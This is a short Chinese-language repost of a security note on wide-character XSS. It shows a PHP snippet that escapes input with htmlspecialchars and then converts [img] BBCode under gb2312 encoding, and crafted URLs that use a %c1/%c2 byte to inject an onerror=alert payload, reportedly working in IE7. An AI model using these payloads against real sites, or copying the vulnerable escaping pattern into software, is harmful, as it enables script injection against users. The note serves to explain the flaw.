轉(zhuǎn)自：狼族

    作者：jackal

    Copy code

   

    $f=htmlspecialchars($_GET["f"]);

    echo preg_replace("/\s*\[img\](.+?)\[\/img\]\s*/i","", $f);

    ?>

    注意編碼方式是gb2312

    提交

    xss.php?f=【img]/Article/UploadFiles/200809/20080902083802508.gif[/img]

    這里可以alert(1)

    同樣還是利用%c1構(gòu)造：

    xss.php?f=【img]onerror=alert(/xss/)%20%c2[/img]

    引入了onerror，我們我們需要的功能了，

寬字符集跨站

電腦資料

    IE7下測(cè)試通過(guò)。

    utf-8在IE6下也有類似的問題。